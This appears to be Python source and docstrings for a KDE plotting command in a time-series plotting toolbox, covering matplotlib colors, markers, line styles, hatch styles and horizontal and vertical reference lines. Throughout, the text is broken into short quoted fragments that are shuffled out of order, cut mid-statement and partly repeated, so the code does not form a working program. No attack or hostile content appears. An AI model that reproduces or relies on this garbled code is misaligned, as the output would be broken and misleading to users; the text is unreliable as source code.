+-------+----------------+ | ``+`` | plus | +-------+----------------+", "\"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\",", "start at the minimum x value for the entire plot.", "the entire plot. vlines_colors: [optional, defaults to None] List of", "# \"ieee\", # \"scatter\", # \"notebook\", # \"high-vis\", # \"bright\",", "is 'default'] 'default' connects the points with lines. The steps", "supply a comma separated list of strings for each time-series", "is not None: m = next(imarkerstyles) else: m = None", "be used as the minimum x values for all horizontal", "= ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, ) plt.xlabel(xtitle)", "allows you to override the names in the data set.", "+-------+----------------+ | ^ | triangle up | +-------+----------------+ | <", "of y values] Comma separated lower and upper limits for", "1 to 1000, where '--xlim ,1000' would base the lower", "as `vlines_x`. If None will take for the standard linestyles", "hlines_xmax = tsutils.make_list(hlines_xmax) hlines_colors = tsutils.make_list(hlines_colors) hlines_linestyles = tsutils.make_list(hlines_linestyles) nxlim", "mark_right=True, scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False, lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\", grid=False,", "of maximum x values to end each horizontal line. If", "\"\"\".format( style, len(nstyle), len(tsd.columns) ) ) ) colors = []", "\"bar_stacked\", and \"barh_stacked\"] If 'auto' will iterate through the available", "[True, False]], 1], # colors=[str, [\"pass\", []], None], # linestyles=[str,", "another style useful for photo-copyable black, white, nd gray. Matplotlib", "of strings if using the Python API. +-----------------+-------------------+ | bar_hatchstyles", "x axis. sharey [optional, default to False] In case subplots=True,", "\"SciencePlots_styles\" ) plot_styles = [ os.path.join(style_loc, i + \".mplstyle\") if", "colors [optional, default is 'auto'] The default 'auto' will cycle", "of the plot. For example, '--xlim 1,1000' would limit the", "| Description | +=================+===================+ | / | diagonal hatching |", "{columns} {start_date} {end_date} {clean} {skiprows} {index_type} {names} {source_units} {target_units} {round_index}", "None, # ], # hlines_y=[float, [\"pass\", []], None], # hlines_xmin=[float,", "vlines_linestyles = tsutils.make_list(vlines_linestyles) nylim = ax.get_ylim() if vlines_ymin is None:", "separated lower and upper limits for the y-axis of the", "): r\"\"\"Plot data.\"\"\" # Need to work around some old", "cycle through matplotlib colors in the chosen style. At the", "Appropriate Styles The styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\"", "' ' | draw nothing | +---------+--------------+ | '' |", "secondary_y [optional, default is False] Whether to plot on the", "used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. {columns}", "to 'plot.png'] Output filename for the plot. Extension defines the", "axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles) + [\"no-latex\"]", "2. Single character code from the table below. +------+---------+ |", "'' | draw nothing | +---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles", "= bool(legend == \"\" or legend == \"True\" or legend", "of color code strings. Can identify colors in four different", "500] The number of random subsets of 'bootstrap_size'. norm_xaxis DEPRECATED:", "== \"\" or legend == \"True\" or legend is None)", "if type in [\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines(", "\"seaborn-muted\", # \"seaborn-notebook\", # \"seaborn-paper\", # \"seaborn-pastel\", # \"seaborn-poster\", #", "len(tsd.columns) ) ) ) colors = [] markerstyles = []", "# \"high-vis\", # \"bright\", # \"vibrant\", # \"muted\", # \"retro\",", "'descending'] How to sort the values for the probability plots.", "You must supply a comma separated list of strings for", "= next(icolors) else: c = None if imarkerstyles is not", "plt.setp(line, linestyle=l) ytitle = ytitle or \"Density\" if legend is", "value or None will end at the maximum x value", "import FixedLocator tsd = tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date,", "not plot a marker. If 'auto' will iterate through the", "| '' | nothing | +-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html style", "\"retro\", # ], # ], # None, # ], #", "http://matplotlib.org/api/colors_api.html linestyles [optional, default to 'auto'] If 'auto' will iterate", "\"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and", "frequency try: try: pltfreq = str(tsd.index.freq, \"utf-8\").lower() except TypeError: pltfreq", "start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title,", "sharey=[bool, [\"domain\", [True, False]], 1], # colors=[str, [\"pass\", []], None],", "a list of strings if using the Python API. To", "label_skip : int [optional] Skip for major labels for bar", "of Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\",", "markerstyles.append(\" \") linestyles.append(\"-\") continue if st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1]) try:", "title : str [optional, defaults to ''] Title of chart.", "codes, or within Python a list of color code strings.", "| +------------------+ | ...etc. | +------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles", "Comma separated lower and upper limits for the y-axis of", "to None] List of linestyles for the vertical lines. If", "to fit in a column of the \"IEEE\" journal. The", "+ plotutils.HATCH_LIST], None], # style=[str, [\"pass\", []], None], # xlim=[float,", "to None] List of minimum x values to start the", "+------+---------+ | c | cyan | +------+---------+ | m |", "1], # xtitle=[str, [\"pass\", []], 1], # ytitle=[str, [\"pass\", []],", ". | dots | +-----------------+-------------------+ | * | stars |", ") def kde( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\",", "\" if i in [\" \", None] else i for", "not None: icolors = itertools.cycle(colors) else: icolors = None imarkerstyles", "used as the linestyle for all horizontal lines. If a", "as needed. lag_plot_lag [optional, default to 1] The lag used", "subset for 'bootstrap' plot. bootstrap_samples [optional, defaults to 500] The", "== \"none\": short_freq = \"\" else: # short freq string", "default is \"default\"] Set the style of the plot. One", "label the axis of the various time-series automatically. scatter_matrix_diagonal :", "defaults to ''] Title of chart. figsize : str [optional,", "+-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html style [optional, default is None] Still", "plot a marker. If 'auto' will iterate through the available", "lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis,", "names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True,", "# \"seaborn-whitegrid\", # \"tableau-colorblind10\", # \"science\", # \"grid\", # \"ieee\",", "| Code | Lines | +=========+==============+ | ``-`` | solid", "sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\",", "list must be same length as `hlines_y`. If None will", "k | black | +------+---------+ 3. Number between 0 and", "[\"pass\", []], 2], # ylim=[float, [\"pass\", []], 2], # xaxis=[str,", "False]], 1], # plotting_position=[ # str, # [ # \"domain\",", "vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\" # Need to", "--xaxis=\"log\" * For --logy use --yaxis=\"log\" * For --norm_xaxis use", "xlim = plotutils.know_your_limits(xlim, axis=xaxis) ylim = plotutils.know_your_limits(ylim, axis=yaxis) plot_styles =", "\"log\"]], 1], # secondary_y=[bool, [\"domain\", [True, False]], 1], # mark_right=[bool,", "x-axis. invert_yaxis [optional, default is False] Invert the y-axis. plotting_position", "strings if using the Python API. +-----------------+-------------------+ | bar_hatchstyles |", "\"notebook\", # \"high-vis\", # \"bright\", # \"vibrant\", # \"muted\", #", "'arithmetic'] Defines the type of the yaxis. One of 'arithmetic',", "using the Python API. Separated 'colors', 'linestyles', and 'markerstyles' instead", "yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # secondary_y=[bool, [\"domain\", [True, False]],", "--norm_xaxis use --type=\"norm_xaxis\" * For --norm_yaxis use --type=\"norm_yaxis\" * For", "line with star marker. bar_hatchstyles [optional, default to \"auto\", only", "+------+---------+ | g | green | +------+---------+ | r |", "styles then each over rides some or all of the", "pd from mando.rst_text_formatter import RSTHelpFormatter from tstoolbox import tsutils from", "\"\", \" \", \" \"] + plotutils.LINE_LIST], # None, #", "# legend_names=[str, [\"pass\", []], 1], # subplots=[bool, [\"domain\", [True, False]],", "+-------+----------------+ | H | hexagon2 | +-------+----------------+ | ``+`` |", "bootstrap_samples [optional, defaults to 500] The number of random subsets", "the linestyle for all horizontal lines. If a list must", "to work around some old option defaults with the implementation", ": | dotted | +---------+--------------+ | None | draw nothing", "the available matplotlib marker types. Otherwise on the command line", "for a histogram. bootstrap_size : int [optional, defaults to 50]", "plot grid lines on the major ticks. label_rotation : int", "to be distinguished by someone with color blindness. Black, White,", "plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2) _, ax = plt.subplots(figsize=figsize) if", "scatter_matrix_diagonal : str [optional, defaults to 'kde'] If plot type", "and weibull_yaxis. prob_plot_sort_values : str [optional, default is 'descending'] How", "# Need to work around some old option defaults with", "tsd = tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date, pick=columns,", "= nylim[0] if vlines_ymax is None: vlines_ymax = nylim[1] if", "horizontal lines. If a list must be same length as", "input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename, xtitle=xtitle,", "== \"auto\": colors = None else: colors = tsutils.make_list(colors) if", "color pallette in the current plot style. hlines_linestyles: [optional, defaults", "stars | +-----------------+-------------------+ logx DEPRECATED: use '--xaxis=\"log\"' instead. logy DEPRECATED:", "the random subset for 'bootstrap' plot. bootstrap_samples [optional, defaults to", "icolors = None imarkerstyles = itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) #", "[]], None], # hlines_linestyles=[ # str, # [\"domain\", [\"auto\", None,", "vlines_x is not None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin)", "for the vertical lines. If a single color then will", "vlines_colors = tsutils.make_list(vlines_colors) vlines_linestyles = tsutils.make_list(vlines_linestyles) nylim = ax.get_ylim() if", "= plotutils.MARKER_LIST else: markerstyles = tsutils.make_list(markerstyles) if markerstyles is None:", "plt.ylabel(ytitle) if invert_xaxis is True: plt.gca().invert_xaxis() if invert_yaxis is True:", "the entire plot. vlines_ymax: [optional, defaults to None] List of", "hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles,", "hlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\", \" \",", "available matplotlib hatch types. Otherwise on the command line a", "label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\",", "| magenta | +------+---------+ | y | yellow | +------+---------+", "hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles, ) if vlines_x is not None: if", "\"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\", #", "kernel density estimation (KDE). {ydata} Parameters ---------- {input_ts} ofilename :", "[]], 1], # grid=[bool, [\"domain\", [True, False]], 1], # label_rotation=[float,", "| +------+---------+ | y | yellow | +------+---------+ | k", "| vertical | +-----------------+-------------------+ | - | horizontal | +-----------------+-------------------+", "| Lines | +=========+==============+ | ``-`` | solid | +---------+--------------+", "# ], # 1, # ], # prob_plot_sort_values=[str, [\"domain\", [\"ascending\",", "xaxis == \"log\": logx = True if yaxis == \"log\":", "| yellow | +------+---------+ | k | black | +------+---------+", "[1, None]], 1], # xtitle=[str, [\"pass\", []], 1], # ytitle=[str,", "linestyles=vlines_linestyles, ) plt.xlabel(xtitle) plt.ylabel(ytitle) if invert_xaxis is True: plt.gca().invert_xaxis() if", "\"auto\": nstyle = tsutils.make_list(style) if len(nstyle) != len(tsd.columns): raise ValueError(", "keyword. +---------+--------------+ | Code | Lines | +=========+==============+ | ``-``", "imarkerstyles is not None: m = next(imarkerstyles) else: m =", "lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax,", "length as `vlines_x`. If a single number will be used", "One of 'kde' for Kernel Density Estimation or 'hist' for", "\"scatter\", \"notebook\", \"high-vis\", \"bright\", \"vibrant\", \"muted\", and \"retro\". If multiple", "to help pretty print the frequency try: try: pltfreq =", "dash_dot | +---------+--------------+ | : | dotted | +---------+--------------+ |", "axis. colors [optional, default is 'auto'] The default 'auto' will", "\"True\" or legend is None) type = \"kde\" import matplotlib", "[]], 1], # figsize=[float, [\"range\", [0, None]], 2], # legend=[bool,", "from matplotlib.ticker import FixedLocator tsd = tsutils.common_kwds( input_ts, skiprows=skiprows, names=names,", "# None, # ], # vlines_x=[float, [\"pass\", []], None], #", "https://github.com/garrettj403/SciencePlots hlines_y: [optional, defaults to None] Number or list of", "# ], # hlines_y=[float, [\"pass\", []], None], # hlines_xmin=[float, [\"pass\",", "# hlines_xmin=[float, [\"pass\", []], None], # hlines_xmax=[float, [\"pass\", []], None],", "linestyles for the vertical lines. If a single linestyle then", "`hlines_y`. If a single number will be used as the", "= [ os.path.join(style_loc, i + \".mplstyle\") if os.path.exists(os.path.join(style_loc, i +", "in [\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin,", "prob_plot_sort_values : str [optional, default is 'descending'] How to sort", "vlines_ymax = nylim[1] if type in [ \"time\", \"xy\", \"bar\",", "to None] List of minimum y values to start the", "markerstyles == \"auto\": markerstyles = plotutils.MARKER_LIST else: markerstyles = tsutils.make_list(markerstyles)", "# sharey=[bool, [\"domain\", [True, False]], 1], # colors=[str, [\"pass\", []],", "octagon | +-------+----------------+ | s | square | +-------+----------------+ |", "else: colors = tsutils.make_list(colors) if linestyles == \"auto\": linestyles =", "on the major ticks. label_rotation : int [optional] Rotation for", "= tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax = tsutils.make_list(vlines_ymax) vlines_colors =", "List of colors for the horizontal lines. If a single", "If None will take for the standard linestyles list. vlines_x:", "comma separated matplotlib color codes, or within Python a list", "beginstr = 1 if pltfreq == \"none\": short_freq = \"\"", "x values] Comma separated lower and upper limits for the", "# mark_right=[bool, [\"domain\", [True, False]], 1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\",", "+-------+----------------+ | d | thin diamond | +-------+----------------+ | _", "for the probability plots. Only used for norm_xaxis, norm_yaxis, lognorm_xaxis,", "\"seaborn-paper\", # \"seaborn-pastel\", # \"seaborn-poster\", # \"seaborn-talk\", # \"seaborn-ticks\", #", "the diagonal. One of 'kde' for Kernel Density Estimation or", "gray, however the \"ieee\" also will change the chart size", "PNG file. If used within Python, and `ofilename` is None", "x value for all horizontal lines. A missing value or", "list must be same length as `vlines_x`. If a single", "legend=[bool, [\"domain\", [True, False]], 1], # legend_names=[str, [\"pass\", []], 1],", "vertical line. vlines_ymin: [optional, defaults to None] List of minimum", "else i for i in plot_styles ] plt.style.use(plot_styles) figsize =", "of y values where to place a horizontal line. hlines_xmin:", "import numpy as np import pandas as pd from mando.rst_text_formatter", "+-------+----------------+ | 3 | tri_left | +-------+----------------+ | 4 |", "function. \"kde\" will create a plot of estimation of the", "value. Strips NANs from beginning and end. {force_freq} invert_xaxis [optional,", "[\"domain\", [True, False]], 1], # sharex=[bool, [\"domain\", [True, False]], 1],", "markerstyles] if colors is not None: icolors = itertools.cycle(colors) else:", "None if c is not None: plt.setp(line, color=c) plt.setp(line, marker=m)", "short_freq = \"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq = \"\" if colors", "mark_right [optional, default is True] When using a secondary_y axis,", "{input_ts} ofilename : str [optional, defaults to 'plot.png'] Output filename", "= 1 if pltfreq == \"none\": short_freq = \"\" else:", "\"bar\", \"barh\", \"bar_stacked\", and \"barh_stacked\"] If 'auto' will iterate through", "on the secondary y-axis. If a list/tuple, which time-series to", "[\"pass\", []], None], # hlines_xmin=[float, [\"pass\", []], None], # hlines_xmax=[float,", "same number of style strings as time-series to plot. You", "'--type=\"lognorm_yaxis\"' instead. xy_match_line : str [optional, defaults is ''] Will", "if ofilename is not None: plt.savefig(ofilename) return plt kde.__doc__ =", "| octagon | +-------+----------------+ | s | square | +-------+----------------+", "| . | dots | +-----------------+-------------------+ | * | stars", ": str [optional, defaults to '10,6.5'] The 'width,height' of plot", "-*- coding: utf-8 -*- \"\"\"Collection of functions for the manipulation", "good value. Strips NANs from beginning and end. {force_freq} invert_xaxis", "\"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\",", "vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, ) plt.xlabel(xtitle) plt.ylabel(ytitle) if invert_xaxis is", "str [optional, default depends on ``type``] Title of y-axis. title", "line a comma separated list, or a list of strings", "') as the linestyle code. Separated 'colors', 'linestyles', and 'markerstyles'", "equal to \"bar\", \"barh\", \"bar_stacked\", and \"barh_stacked\"] If 'auto' will", "| ^ | triangle up | +-------+----------------+ | < |", "values for all horizontal lines. A missing value or None", "label_skip=1, force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None,", "legend label the axis of the various time-series automatically. scatter_matrix_diagonal", "ofilename=[str, [\"pass\", []], 1], # type=[str, [\"domain\", [\"kde\",],], 1,], #", "use --type=\"lognorm_yaxis\" * \"\"\" ) if xaxis == \"log\": logx", "to '10,6.5'] The 'width,height' of plot in inches. legend [optional,", "len(tsd.columns): raise ValueError( tsutils.error_wrapper( \"\"\" You have to have the", "linestyles=hlines_linestyles, ) if vlines_x is not None: if type in", "of y-axis. title : str [optional, defaults to ''] Title", "\"log\": logx = True if yaxis == \"log\": logy =", "to place a vertical line. vlines_ymin: [optional, defaults to None]", "the legend. legend_names : str [optional, defaults to None] Legend", "mando import numpy as np import pandas as pd from", "b | blue | +------+---------+ | g | green |", "[optional, defaults to None] Number or list of y values", "y axis. colors [optional, default is 'auto'] The default 'auto'", "# str, # [\"domain\", [\"auto\", None, \"\", \" \", \"", "| crossed | +-----------------+-------------------+ | x | crossed diagonal |", "styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\",", "| +-----------------+-------------------+ | ``\\`` | back diagonal | +-----------------+-------------------+ |", "os.path.join(style_loc, i + \".mplstyle\") if os.path.exists(os.path.join(style_loc, i + \".mplstyle\")) else", "the data set. You must supply a comma separated list", "y-axis. If a list/tuple, which time-series to plot on secondary", "You have to have the same number of style strings", "time-series automatically. scatter_matrix_diagonal : str [optional, defaults to 'kde'] If", "[optional, defaults to None] List of linestyles for the vertical", "standard linestyles list. \"\"\" plt = kde( input_ts=input_ts, columns=columns, start_date=start_date,", "but you have {} time-series. \"\"\".format( style, len(nstyle), len(tsd.columns) )", "+------+---------+ | k | black | +------+---------+ 3. Number between", "of estimation of the probability density function based on the", ": str [optional, defaults to 'kde'] If plot type is", "| chartreuse | +------------------+ | ...etc. | +------------------+ Color reference:", "plt.subplots(figsize=figsize) if type in [\"kde\", \"probability_density\"]: ax = tsd.plot.kde( legend=legend,", "for the horizontal lines. If a single color then will", "[0, None]], 2], # legend=[bool, [\"domain\", [True, False]], 1], #", "\"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\",", "# [ # \"classic\", # \"Solarize_Light2\", # \"bmh\", # \"dark_background\",", "is maintained for backward-compatibility. ACCEPTS:: ['default' | 'steps' | 'steps-pre'", "right | +-------+----------------+ | 1 | tri_down | +-------+----------------+ |", "bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False, lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\", grid=False, label_rotation=None, label_skip=1,", "will override the others. Comma separated matplotlib style strings per", "\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]: if hlines_y is not None: if", "| +-------+----------------+ | v | triangle down | +-------+----------------+ |", "# style=[str, [\"pass\", []], None], # xlim=[float, [\"pass\", []], 2],", "linestyles = tsutils.make_list(linestyles) if bar_hatchstyles == \"auto\": bar_hatchstyles = plotutils.HATCH_LIST", "D | diamond | +-------+----------------+ | d | thin diamond", "as np import pandas as pd from mando.rst_text_formatter import RSTHelpFormatter", "import pandas as pd from mando.rst_text_formatter import RSTHelpFormatter from tstoolbox", "+-----------------+-------------------+ | ``|`` | vertical | +-----------------+-------------------+ | - |", "'steps-mid' | 'steps-post'] por [optional] Plot from first good value", "the frequency try: try: pltfreq = str(tsd.index.freq, \"utf-8\").lower() except TypeError:", "[optional, defaults to None] List of x values where to", "ACCEPTS:: ['default' | 'steps' | 'steps-pre' | 'steps-mid' | 'steps-post']", "length as `vlines_x`. If a single number will be the", "i for i in markerstyles] if colors is not None:", "the xaxis. One of 'arithmetic', 'log'. yaxis : str [optional,", "\"bright\", \"vibrant\", and \"muted\" are all styles that are setup", "[True, False]], 1], # label_rotation=[float, [\"pass\", []], 1], # label_skip=[int,", "'hist' for a histogram. bootstrap_size : int [optional, defaults to", "style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\", xlim=None, ylim=None, secondary_y=False, mark_right=True, scatter_matrix_diagonal=\"kde\",", "time-series to plot. You supplied '{}' for style which has", "[optional, default is 'arithmetic'] Defines the type of the xaxis.", "round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None,", "tsutils.make_list(style) if len(nstyle) != len(tsd.columns): raise ValueError( tsutils.error_wrapper( \"\"\" You", "1], # invert_yaxis=[bool, [\"domain\", [True, False]], 1], # plotting_position=[ #", "at the maximum x value for the entire plot. hlines_colors:", "drawstyle : str [optional, default is 'default'] 'default' connects the", "Whether to display the legend. legend_names : str [optional, defaults", "# secondary_y=[bool, [\"domain\", [True, False]], 1], # mark_right=[bool, [\"domain\", [True,", "separated list of strings for each time-series in the data", "h | hexagon1 | +-------+----------------+ | H | hexagon2 |", "], # hlines_y=[float, [\"pass\", []], None], # hlines_xmin=[float, [\"pass\", []],", "http://matplotlib.org/api/markers_api.html style [optional, default is None] Still available, but if", "[optional, defaults to None] List of maximum x values to", "override the others. Comma separated matplotlib style strings per time-series.", "| +-------+----------------+ | 1 | tri_down | +-------+----------------+ | 2", "use '--type=\"lognorm_xaxis\"' instead. lognorm_yaxis DEPRECATED: use '--type=\"lognorm_yaxis\"' instead. xy_match_line :", "@mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None,", "some or all of the characteristics of the previous. Color", "| H | hexagon2 | +-------+----------------+ | ``+`` | plus", "| +==================+ | red | +------------------+ | burlywood | +------------------+", "vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, ) plt.xlabel(xtitle) plt.ylabel(ytitle) if invert_xaxis", "a comma separated list of strings for each time-series in", "\"default\"] Set the style of the plot. One or more", "values to start the horizontal line. If a list must", "'default'] 'default' connects the points with lines. The steps variants", "beginstr = 3 else: beginstr = 1 if pltfreq ==", "\"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\",", "False]], 1], # sharey=[bool, [\"domain\", [True, False]], 1], # colors=[str,", "Python API. To not display lines use a space ('", "| +-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html style [optional, default is None]", "norm_xaxis=False, norm_yaxis=False, lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\", grid=False, label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\",", "# \"seaborn-dark\", # \"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\", # \"seaborn-muted\",", "vertical lines. A missing value or None will start at", "round_index=round_index, dropna=\"all\", source_units=source_units, target_units=target_units, clean=clean, por=por, ) tsd, lnames =", "plot. You supplied '{}' for style which has {} style", "solid | +---------+--------------+ | -- | dashed | +---------+--------------+ |", "be used as the minimum x values for all vertical", "' '] The default ' ' will not plot a", "triangle right | +-------+----------------+ | 1 | tri_down | +-------+----------------+", "+-----------------+-------------------+ | O | large circle | +-----------------+-------------------+ | .", "\"tableau-colorblind10\", and SciencePlots styles \"science\", \"grid\", \"ieee\", \"scatter\", \"notebook\", \"high-vis\",", "# label_skip=[int, [\"range\", [1, None]], 1], # drawstyle=[str, [\"pass\", []],", "Nth color from the current style. 2. Single character code", "pltfreq == \"none\": short_freq = \"\" else: # short freq", "| +------------------+ | burlywood | +------------------+ | chartreuse | +------------------+", "A missing value or None will start at the minimum", "is a number from 0 to 9 that gets the", "# \"bmh\", # \"dark_background\", # \"fast\", # \"fivethirtyeight\", # \"ggplot\",", "# vlines_ymax=[float, [\"pass\", []], None], # vlines_colors=[str, [\"pass\", []], None],", "Only for bar, barh, bar_stacked, and barh_stacked. ibar_hatchstyles = itertools.cycle(bar_hatchstyles)", "use --type=\"norm_xaxis\" * For --norm_yaxis use --type=\"norm_yaxis\" * For --lognorm_xaxis", "In case subplots=True, share x axis. sharey [optional, default to", "| b | blue | +------+---------+ | g | green", "[\"pass\", []], 2], # xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], #", "for the horizontal lines. If a single linestyle then will", "is False] Invert the x-axis. invert_yaxis [optional, default is False]", "[optional, default is None] Still available, but if None is", "'ColorMarkerLine' order, for example 'r*--' is a red dashed line", "\", \" \"] + plotutils.HATCH_LIST], None], # style=[str, [\"pass\", []],", "[]], 2], # ylim=[float, [\"pass\", []], 2], # xaxis=[str, [\"domain\",", "# vlines_x=[float, [\"pass\", []], None], # vlines_ymin=[float, [\"pass\", []], None],", "...etc. | +------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles [optional, default to", "| D | diamond | +-------+----------------+ | d | thin", "vertical lines. If a single linestyle then will be used", "| circle | +-------+----------------+ | v | triangle down |", "plot on secondary y-axis. mark_right [optional, default is True] When", "same length as `hlines_y`. If None will take for the", "tsutils.make_list(linestyles) if bar_hatchstyles == \"auto\": bar_hatchstyles = plotutils.HATCH_LIST else: bar_hatchstyles", "or None will end at the maximum x value for", "if type in [ \"time\", \"xy\", \"bar\", \"bar_stacked\", \"histogram\", \"norm_xaxis\",", "logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size,", "(day) OR (2 day) short_freq = \"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq", "beginning and end. {force_freq} invert_xaxis [optional, default is False] Invert", "# bootstrap_size=[int, [\"range\", [0, None]], 1], # xy_match_line=[str, [\"pass\", []],", ",1000' would base the lower limit on the data and", "m = None if ilinestyles is not None: l =", "as `hlines_y`. If None will take for the standard linestyles", "], # prob_plot_sort_values=[str, [\"domain\", [\"ascending\", \"descending\"]], 1], # plot_styles=[ #", "horizontal line. If a list must be same length as", "== \"auto\": bar_hatchstyles = plotutils.HATCH_LIST else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles) if", "of the HTML color names. +------------------+ | HTML Color Names", "0 to 9 that gets the Nth color from the", "back diagonal | +-----------------+-------------------+ | ``|`` | vertical | +-----------------+-------------------+", "the HTML color names. +------------------+ | HTML Color Names |", "= 3 else: beginstr = 1 if pltfreq == \"none\":", "nothing | +---------+--------------+ | ' ' | draw nothing |", "linestyles.append(\"-\") continue if st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1]) try: linestyles.append(st[2:]) except", "values to end each horizontal line. If a list must", "1 is black. 4. Any of the HTML color names.", "if type in [\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines(", "all horizontal lines. If a list must be same length", "of x values where to place a vertical line. vlines_ymin:", "vlines_ymax is None: vlines_ymax = nylim[1] if type in [", "colors for the horizontal 